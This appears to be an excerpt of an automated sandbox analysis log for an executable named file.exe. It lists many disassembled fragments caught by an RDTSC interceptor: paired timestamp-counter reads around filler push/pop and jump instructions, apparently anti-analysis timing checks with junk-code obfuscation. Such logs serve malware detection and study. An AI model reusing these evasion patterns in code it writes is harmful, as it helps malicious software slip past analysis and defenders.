Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3A72 second address: DA3A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3BAD second address: DA3BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F12792CFFADh 0x0000000b jbe 00007F12792CFFA6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA45F0 second address: DA45F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA45F4 second address: DA460D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFAEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA460D second address: DA4613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD920 second address: DAD947 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F12792CFFA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F12792CFFB9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB781 second address: DAB7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F127853B646h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D339E5 second address: D339ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB8E5 second address: DAB8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B654h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB8FF second address: DAB91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F12792CFFA6h 0x0000000a popad 0x0000000b jbe 00007F12792CFFAAh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB91E second address: DAB923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAC0A5 second address: DAC0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F12792CFFA6h 0x0000000a je 00007F12792CFFA6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jnl 00007F12792CFFA6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAC0C5 second address: DAC0E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007F127853B646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F127853B651h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DACF6C second address: DACF70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DACF70 second address: DACF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DACF76 second address: DACF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD5C6 second address: DAD5DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F127853B64Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD5DD second address: DAD5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD5E3 second address: DAD5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD5E8 second address: DAD5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD5EE second address: DAD60C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B654h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAD60C second address: DAD610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB2426 second address: DB2465 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F127853B656h 0x0000000f jmp 00007F127853B64Ah 0x00000014 jl 00007F127853B646h 0x0000001a jng 00007F127853B65Bh 0x00000020 jmp 00007F127853B653h 0x00000025 push edi 0x00000026 pop edi 0x00000027 pushad 0x00000028 push esi 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3B0B second address: DB3B11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3B11 second address: DB3B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6AEA second address: DB6AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6AEE second address: DB6B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F127853B650h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6B08 second address: DB6B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFB3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F12792CFFACh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6FA1 second address: DB6FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB7376 second address: DB737C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB737C second address: DB7386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F127853B646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB74FF second address: DB7503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC1808 second address: DC181B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 js 00007F127853B646h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF9D4 second address: DBF9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFF4A second address: DBFF5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B64Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC0242 second address: DC0246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC0246 second address: DC024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC024C second address: DC026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F12792CFFB7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC026D second address: DC0277 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F127853B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC0277 second address: DC0282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F12792CFFA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC03E5 second address: DC03F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F127853B646h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC03F4 second address: DC03FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC03FA second address: DC03FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC03FE second address: DC0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC0402 second address: DC040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F127853B646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC040E second address: DC0433 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F12792CFFA6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c jmp 00007F12792CFFACh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC0433 second address: DC0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC05B7 second address: DC05C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F12792CFFA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC8430 second address: DC8443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F127853B646h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC8443 second address: DC8447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC8447 second address: DC8456 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F127853B646h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5A3A second address: DD5A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F12792CFFCDh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9FE7 second address: DDA004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B64Eh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007F127853B646h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDA004 second address: DDA00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9CFD second address: DD9D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD9D03 second address: DD9D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE6B6 second address: DEE6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE6CE second address: DEE6D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE81D second address: DEE827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE827 second address: DEE835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jg 00007F12792CFFA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE835 second address: DEE842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F127853B646h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEA99 second address: DEEA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEA9D second address: DEEAAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F127853B646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEF01 second address: DEEF0D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F12792CFFAEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFAAA second address: DEFAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF31A7 second address: DF31BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F12792CFFA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF31BB second address: DF31BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF31BF second address: DF31C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03CC4 second address: E03CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F127853B654h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03CE3 second address: E03CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03CE7 second address: E03CF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03CF0 second address: E03CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E03B66 second address: E03B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E05612 second address: E05618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFEF31 second address: DFEF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B652h 0x00000009 jmp 00007F127853B64Fh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFEF57 second address: DFEF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F12792CFFA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFEF61 second address: DFEF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F127853B658h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFEF8F second address: DFEFA5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12792CFFACh 0x00000008 jc 00007F12792CFFA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F12792CFFA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E13BE5 second address: E13BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E24C73 second address: E24C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F12792CFFA6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E23E2D second address: E23E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E247BC second address: E247FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12792CFFB7h 0x00000010 pushad 0x00000011 ja 00007F12792CFFA6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E247FB second address: E24805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F127853B646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E24805 second address: E24822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F12792CFFAAh 0x0000000c jmp 00007F12792CFFAAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E26394 second address: E26398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A2B0 second address: D0A2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A2BE second address: D0A2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E28D21 second address: E28D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFADh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E28E0F second address: E28E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B650h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E28E23 second address: E28E28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2906B second address: E29071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E29071 second address: E29075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E29075 second address: E29087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jng 00007F127853B64Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2AD1C second address: E2AD21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2C8B6 second address: E2C8DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B655h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F127853B646h 0x0000000f jo 00007F127853B646h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8032E second address: 4D80343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80343 second address: 4D80372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push edx 0x0000000c mov eax, 2AADCE65h 0x00000011 pop eax 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F127853B64Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D803E2 second address: 4D803E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D803E6 second address: 4D803EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D803EC second address: 4D80428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F12792CFFB2h 0x0000000b jmp 00007F12792CFFB5h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop ecx 0x0000001a mov dx, E81Ah 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BFDB second address: D4BFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80BF4 second address: 4D80BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
